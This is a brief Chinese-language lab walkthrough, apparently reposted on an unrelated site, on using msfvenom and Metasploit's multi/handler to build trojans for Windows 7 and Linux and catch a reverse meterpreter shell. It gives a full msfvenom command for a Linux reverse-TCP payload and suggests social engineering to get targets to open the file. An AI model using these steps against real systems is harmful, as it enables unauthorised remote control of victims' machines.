MSF上线 |
您所在的位置:网站首页 › ngrokcc › MSF上线 |
实验环境: 攻 击 机:kali-Linux 目标主机:windows7 / kali-Linux 工 具:msfvenom(kali预装) windows7: 1.首先关闭防火墙 控制面板-关闭windows防火墙 2.使用msfvenom生成木马 查看帮助 生成木马 3.打开监听 打开MSF 使用侦听模块:use exploit/multi/handler 设置选项:show options 设置IP和端口: 运行发现报错 排查发现payload和生成木马的payload不一致 修改payload 4.在目标主机windows7打开.exe文件 #实战中使用社工诱导目标打开木马 5.反弹shell,可执行命令 #后渗透命令请参考:后渗透命令参考 Linux: 目标主机是Linux x64系统 1.生成木马: msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=9999 -f elf > pb.elf ELF:Executable and Linkable Format #可执行与可链接格式2.打开监听 use exploit/multi/handler 3. 设置IP和端口 4.设置payload:linux/x64/meterpreter/reverse_tcp 6. 增加可执行权限 执行:chmod +x pb.elf 7.运行 反弹shell 8.可执行命令 以上内容仅作为学习交流之用! |
今日新闻 |
推荐新闻 |
CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3 |